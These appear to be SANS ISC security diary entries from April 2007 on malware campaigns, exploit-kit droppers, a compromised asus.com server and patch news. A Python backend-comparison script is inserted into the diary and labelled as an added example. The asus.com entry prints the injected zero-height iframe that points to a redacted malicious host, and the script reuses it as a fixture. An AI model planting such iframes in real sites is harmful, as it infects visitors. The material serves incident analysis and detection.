If you're still not blocking EXEs on your email gateway, chances are your users are getting flooded by the latest scam at the moment. We're receiving reports of a "movie.exe" (MD5 95c563731b7828d6e98eae81ee08869f) making the rounds, attached to emails with very "clickable" subject lines like "USA Just Have Started World War III" / "Missle Strike: The USA kills more then 20000 Iranian citizens" / "Israel Just Have Started World War III".  You get the drift: the kind of friendly headlines you would expect to get on a peaceful Easter Sunday.   AV coverage is nonexistent at this time, so be careful.
Thanks to Mike for submitting the first sample of this critter!


Published: 2007-04-08

Not so funny.php

With all the malware and exploit files around, I find it hard to remember any specific attack. But when, while analyzing a suspicious site today, I came across an exploit which tried to download a binary called "funny.php", it felt enough like a glitch in the matrix to make me look back through my logs. And indeed, there was another funny.php from the same server in Malaysia almost a month ago, and another, five days ago, from a server in Germany. The EXEs the exploit tries to retrieve vary (of course), but the exploit pattern is always the same.

The first file, commonly included per IFRAME, contains a file part named "in.php?adv=1". This file contains an encoded blob of JavaScript, which is not reliably detected by AV (from the scanners I have at hand to verify, only Kaspersky, FSecure and McAfee seem to recognize it at all). Once manually decoded, AV detection improves somewhat, but is still leaky. The decoded blob reveals a bunch of "friendly" little code snippets:

1. Exploit-Byteverify (a quite wizened Java exploit)
2. An exploit for MS06-014, with the code lifted almost verbatim from the corresponding Metasploit module
3. A copy of the MS06-057 WebViewFolderIcon.SetSlice exploit, artfully rendered to avoid detection

If any of these is successful, the exploit downloads and runs the mentioned "funny.php?adv=1" files, which invariably turn out to be Trojan downloaders or worse. The funny.php thingies are apparently refreshed frequently enough to keep AV coverage low to nonexistent.

While none of the three exploits is lethal on a well-patched PC, the prevalence and endurance of these not-so-funny PHPs suggest that there are still far too many PCs out there that fall for this sort of attack. We have informed the two affected ISPs in Germany and Malaysia; let's see who has staff on duty on an Easter weekend...


Published: 2007-04-07

New MS DNS Vulnerability creeping up?

We are currently investigating a possible exploit with MS, Active Directory, and DNS.  At this point the information looks solid, provided initially by Bill O. for review.  Further information has been provided by Bill, who is working on contacting MS, as things have progressed.  Looking at the description of the attack method, it looks solid based on my experience with MS.  If anybody has any scans from the 61.63.xxx.xxx range, I would be very interested in seeing full captures.

We will keep you posted as things progress.  I will be sending on what we have discovered as well to MS tomorrow.  It is 0130EST right now in the US, I will be passing the findings on to the other Handlers for review and input later this morning.


Published: 2007-04-06

asus.com exploited

In the past days a handful of readers had sent us notes that asus.com was compromised. We unfortunately could not find anything wrong in the html at all.

Today the Kaspersky blog had an entry about an ANI exploit loaded via an iframe at asus.com.

So we fetched a new copy; still nothing to be seen. Until Johannes suggested asus.com might be load balanced, and indeed it is using DNS load balancing:

$ dig asus.com a

; <<>> DiG 9.2.3 <<>> asus.com a
;; global options: printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19075
;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 2, ADDITIONAL: 0

;asus.com. IN A

asus.com. 14400 IN A
asus.com. 14400 IN A

asus.com. 14400 IN NS dns3.asus.com.
asus.com. 14400 IN NS dns7.asus.com.

;; Query time: 18 msec
;; WHEN: Fri Apr 6 23:33:01 2007
;; MSG SIZE rcvd: 96

Fetching a copy of the home page of both servers, and comparing the resulting page yields:

(line breaks added to make page easier to read)

$ diff index.html index.html.1 
</table><iframe src=http://[DELETED].com/app/helptop.do?id=ad003
width=100 height=0></iframe>

Just goes to show that a load-balanced site is a pain to investigate if only some of the servers are affected.
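The procedure used above (resolve every A record, fetch the same page from each address, diff the results) is worth having as a script for the next load-balanced site. The following Python is an added example, not from the diary or from ISC: `fetch` is injected so the comparison runs offline here, with two constructed backends modelled on the diary's diff (one clean, one serving an extra zero-height iframe); in real use `fetch` would connect to each address directly and send the request with `Host: <hostname>` so every backend returns the page for that name. Function names, sample addresses and the page bodies are assumptions.

```python
import difflib
import hashlib


def fetch_all(host, addrs, fetch):
    """Fetch the same page from every backend. `fetch(addr, host)` returns the
    body as bytes; a real implementation connects to `addr` directly and sets
    the Host header to `host`, which is what defeats DNS round-robin."""
    return {addr: fetch(addr, host) for addr in addrs}


def compare_backends(host, addrs, fetch):
    """Group backends by the SHA-256 of the page they serve and, if they
    disagree, collect the lines that differ from the first backend."""
    pages = fetch_all(host, addrs, fetch)
    by_hash = {}
    for addr, body in pages.items():
        by_hash.setdefault(hashlib.sha256(body).hexdigest(), []).append(addr)
    if len(by_hash) == 1:
        return {"consistent": True, "groups": by_hash, "diff": []}
    ref_addr = addrs[0]
    ref_lines = pages[ref_addr].decode("utf-8", "replace").splitlines()
    diff = []
    for addr in addrs[1:]:
        if pages[addr] == pages[ref_addr]:
            continue
        other = pages[addr].decode("utf-8", "replace").splitlines()
        for line in difflib.unified_diff(ref_lines, other, fromfile=ref_addr,
                                         tofile=addr, lineterm="", n=0):
            # keep only added/removed content, not the ---/+++/@@ headers
            if line[:1] in "+-" and not line.startswith(("+++", "---")):
                diff.append(line)
    return {"consistent": False, "groups": by_hash, "diff": diff}


def looks_like_injection(diff_lines):
    """Added lines carrying a zero-height iframe: the classic sign of a
    backend that has been tampered with."""
    hits = []
    for line in diff_lines:
        low = line.lower()
        if line.startswith("+") and "<iframe" in low and (
                "height=0" in low or 'height="0"' in low):
            hits.append(line)
    return hits


# Constructed backends for the offline demonstration.
CLEAN = b"<html><body>\n<table><tr><td>welcome</td></tr></table>\n</body></html>\n"
TAINTED = (b"<html><body>\n<table><tr><td>welcome</td></tr></table>"
           b"<iframe src=http://[DELETED].com/app/helptop.do?id=ad003 "
           b"width=100 height=0></iframe>\n</body></html>\n")
FAKE_BACKENDS = {"192.0.2.1": CLEAN, "192.0.2.2": TAINTED}


def fake_fetch(addr, host):
    return FAKE_BACKENDS[addr]


def example():
    return compare_backends("asus.com", ["192.0.2.1", "192.0.2.2"], fake_fetch)


if __name__ == "__main__":
    result = example()
    print("consistent:", result["consistent"])
    for line in result["diff"]:
        print(line)
    print("injection candidates:", len(looks_like_injection(result["diff"])))
```

Hashing first keeps the output small when a site has many backends: only the groups that disagree get diffed, and a site where every address serves the same bytes is reported as consistent without a diff at all.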

The script, at the time we looked at it, was obfuscated and led to a VBScript that is up to no good, pointing to another obfuscated JavaScript and an executable cloaked as a JPG file.

That file gives following over at virustotal:

Antivirus Version Update Result
AhnLab-V3 2007.4.7.0 20070406 -
AntiVir 20070406 TR/Drop.Ag.344576.B
Authentium 4.93.8 20070406 Possibly a new variant of W32/PWStealer.gen1
Avast 4.7.936.0 20070406 Win32:Tibs-ADO
AVG 20070405 -
BitDefender 7.2 20070406 -
CAT-QuickHeal 9.00 20070406 (Suspicious) - DNAScan
ClamAV devel-20070312 20070406 -
DrWeb 4.33 20070406 -
eSafe 20070406 suspicious Trojan/Worm
eTrust-Vet 30.7.3546 20070406 Win32/NSAnti
Ewido 4.0 20070406 -
F-Prot 20070404 W32/PWStealer.gen1
F-Secure 6.70.13030.0 20070406 -
FileAdvisor 1 20070407 -
Fortinet 20070406 suspicious
Ikarus T3.1.1.3 20070406 MalwareScope.Worm.Viking.3
Kaspersky 20070406 Trojan-PSW.Win32.OnLineGames.kw
McAfee 5003 20070406 New Malware.bc
Microsoft 1.2405 20070406 -
NOD32v2 2171 20070406 -
Norman 5.80.02 20070405 -
Panda 20070406 Suspicious file
Prevx1 V2 20070407 -
Sophos 4.16.0 20070406 Mal/EncPk-F
Sunbelt 2.2.907.0 20070403 -
Symantec 10 20070406 -
TheHacker 20070404 -
VBA32 3.11.3 20070406 Trojan-PSW.Win32.Nilage.ara
VirusBuster 4.3.7:9 20070406 -
Webwasher-Gateway 6.0.1 20070406 Trojan.Drop.Ag.344576.B

Name next3.png
Size 100539
md5 42a248b8634da52d6044f87db9a8d794
sha1 cf612836be3c763ab9dc2c9afc0ccc112f2c2a04
Date scanned 04/07/2007 00:09:16 (CET)

Password stealer it seems, same old goal.

I've not seen an ANI exploit in there right now, but we could easily be looking at something that's dynamic in some other way as well.

Swa Frantzen -- NET2S



Published: 2007-04-05

iPod Linux virus PoC

Symantec and Viruslist.com have write-ups on a new virus that infects iPods running Linux. According to Symantec, it infects anything in /usr/lib with "mod.so" in the filename. It also displays a simple message letting you know you are infected (there is a nice screen shot of this on the Viruslist page). Kinda novel. :)




Published: 2007-04-05

Microsoft April Security Bulletin Advance Notification

It is almost that day and in anticipation of patch Tuesday, Microsoft has published their day's menu for us.
We've got four new bulletins coming out with a top severity of Critical and a requirement for rebooting.

Of note is the news that they will also be releasing a number of high-priority non-security updates as well, though no further information is available till next week.



Published: 2007-04-04

Is WEP dead yet? Should it be?

We've known almost from its release that there were some significant weaknesses in WEP (Wired Equivalent Privacy).  AirSnort and WEPcrack, among other packages, have been able to crack WEP keys fairly easily if they could sniff enough of the encrypted traffic.  One of our readers (thanx, Mike) noted a new paper by three folks from the Darmstadt Technical University in Germany entitled Breaking 104 bit WEP in less than 60 seconds.  They explain how an updated attack on the underlying RC4 algorithm allows much faster cracking of WEP (over an order of magnitude faster) than previously realized.  We have long recommended that WEP be abandoned in favor of WPA (or, even better, WPA2).  This new work demonstrates that WEP is little more than an annoyance to folks really interested in seeing your traffic.


Published: 2007-04-04

Various Vista Concerns

I ran across a couple of stories in the last day or two that got me thinking about how much of security relies on assumptions that aren't necessarily always validated (remember Ronald Reagan's old adage "Trust, but verify"?).  The first one is this story from Blackhat Amsterdam about VBootkit.  The key quote from the story is "Experts say that the fundamental problem that this highlights is that every stage in Vista's booting process works on blind faith that everything prior to it ran cleanly."  The other one was this story from one of the guys at CERIAS at Purdue about the introduction of symbolic links in Vista.  Frankly, I haven't paid enough attention to Vista yet to realize they had added symbolic links, and I don't program for Windows, but having been a programmer in a previous life, the possible implications of this one jumped out at me.  Further, I suspect that, all too soon, we'll be seeing all the race conditions with symlinks in Vista that we've seen in Unix/Linux over the years.  The more things change, the more things stay the same, huh?!


Published: 2007-04-04

telnetd deja vu, this time it is Kerberos 5 telnetd

It seems like it was just a couple of weeks ago that we noted issues with the Solaris telnetd.  A couple of our readers took exception to our statement in the earlier story that telnet shouldn't be open to the internet.  Some of them pointed out that Kerberized telnetd uses much stronger authentication and can optionally encrypt traffic.  That is all well and good, but I don't consider that ordinary telnet(d).  Today, I noticed a RedHat bulletin (and subsequently, the official MIT advisory) about a vulnerability in Kerberos 5 telnetd (so it isn't any safer from bugs creeping into the code) that could allow unauthenticated root login by passing a crafted username (a different bug than the Solaris one).   Note that in neither case is the issue with the client, the issue is on the server side.  There are still valid reasons to have the telnet client on machines.  Anyway, krb5-telnet is not enabled by default on RedHat (or any other Linux/Unix that I'm aware of), but if you use it, update as soon as possible/practical.  I assume that other Linux distributions will have updates soon, if not already available.  If you are building from source, please see the MIT advisory.

http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-0956 (not live yet)


Published: 2007-04-04

Microsoft Patch May Be Causing Some Problems

We have received several emails today from people who are having problems with the patch.  One that is confirmed by Microsoft is the Realtek problem.  Microsoft has been working on this problem and has provided a patch for it at:


Other possible issues have been reported and are being investigated.  Microsoft is asking anyone having problems after installing the patch to contact them at Microsoft Product Support Services at 1-866-PCSAFETY.  There is no charge for the support relating to Microsoft Security Updates.



Published: 2007-04-03

* Microsoft out of cycle patch

Overview of the out of cycle patch.

MS07-017
  • Affected: Multiple graphical format vulnerabilities. Replaces MS06-001 and MS05-053, and MS05-002 on Windows 2003. Windows, all versions.
  • Contra indications: No known problems
  • Known exploits: SA 935423, KB 925902. Actively exploited.
  • Microsoft rating: Critical
  • ISC rating(*): clients PATCH NOW, servers Important

We will update issues on this page as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY

(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. The measures we presume are simple best practices for servers, such as not using Outlook, MSIE, Word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

Swa Frantzen -- NET2S


Published: 2007-04-02

Week of Vista bugs is a hoax

Month (or weeks/days/...) of bugs: We try to give them as little publicity as possible in order to discourage the behavior and encourage a bit more responsibility than to disclose vulnerability details in a blog.

Now with April 1st just behind us we were ready for a good laugh with people falling for a hoax or two, but once it's April 2nd, you expect people to resume normal behavior.

Still, the first installment of the week of Vista bugs seemed bad when skimmed, but turned out to be unfounded and hard to believe at all upon closer inspection.

A friendly contact gave us this link:
Where the perps expose their own hoax.

Just don't believe everything you read on the Internet ... not even on April 2nd and the days after it.

And forget the Week of Vista bugs unless you urgently need a laugh.
Swa Frantzen -- NET2S


Published: 2007-04-02

and in other news

ANI has been keeping us busy over the last few days, but it hasn't been the only thing that has been going on.  So here is a mini update.
  • ie7.0.exe - This started appearing about the same time as the ANI exploits, mainly on web sites, but currently it is being distributed via SPAM messages.  Typically an image SPAM message which links to a web page with the exploit.  We've seen two names, ie7.0.exe and DirectX-10.exe.  Detection rates are improving and most AV products should catch this one.  Once infected, the compromised host will start to SPAM (but since we are all blocking executables, especially in emails, this shouldn't be much of a problem).
  • PHP scanning - We've had a few reports of PHP scanning coming out of Hong Kong (based on the source addresses).  It seems to be fairly generic, as it is hitting sites that do not have PHP as well as PHP sites.
  • DST Part 2 - The original Daylight Saving Time start date passed on the weekend.  So far the only reports we've had were:
    • Church Bells ringing at the wrong time
    • A web site providing TV guides was out by an hour causing some initial confusion for one user at least
  • April Fools - ISC did not participate in light of the ANI issue (disappointing several handlers who were all geared up to go), but there were plenty of others who did.  We received a number of emails that got a "check the date" reply.
Mark H


Published: 2007-04-02

*Microsoft to Release Out-of-Schedule Patch for ANI Vulnerability

I don't think this is an April Fools' Hoax. 

The Microsoft Security Response Center blog reports that they "have been working around the clock to test this update and are currently planning to release the security update that addresses this (ANI) issue on Tuesday April 3, 2007."

This is further supported here: www.microsoft.com/technet/security/bulletin/advance.mspx